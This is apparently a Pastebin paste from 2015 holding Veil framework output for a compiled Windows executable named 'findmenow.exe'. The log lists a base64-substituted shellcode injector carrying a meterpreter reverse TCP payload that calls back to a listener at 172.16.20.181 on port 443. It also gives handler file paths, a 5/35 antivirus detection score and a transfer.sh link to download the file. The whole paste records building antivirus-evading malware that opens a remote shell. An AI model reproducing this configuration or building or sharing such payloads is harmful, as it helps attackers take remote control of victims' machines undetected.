Advertisement
SH1NU11b1

V_exp2

Jul 28th, 2015
261
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.53 KB | None | 0 0
  1. [*] Executable written to: /usr/share/veil-output/compiled/findmenow.exe
  2.  
  3. Language: python
  4. Payload: python/shellcode_inject/base64_substitution
  5. Shellcode: windows/meterpreter/reverse_tcp
  6. Options: LHOST=172.16.20.181 LPORT=443
  7. Required Options: compile_to_exe=Y expire_payload=X
  8. inject_method=Virtual use_pyherion=N
  9. Payload File: /usr/share/veil-output/source/findmenow.py
  10. Handler File: /usr/share/veil-output/handlers/findmenow
  11.  
  12. AV
  13. 5/35
  14.  
  15. https://transfer.sh/1e8JND/findmenow.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement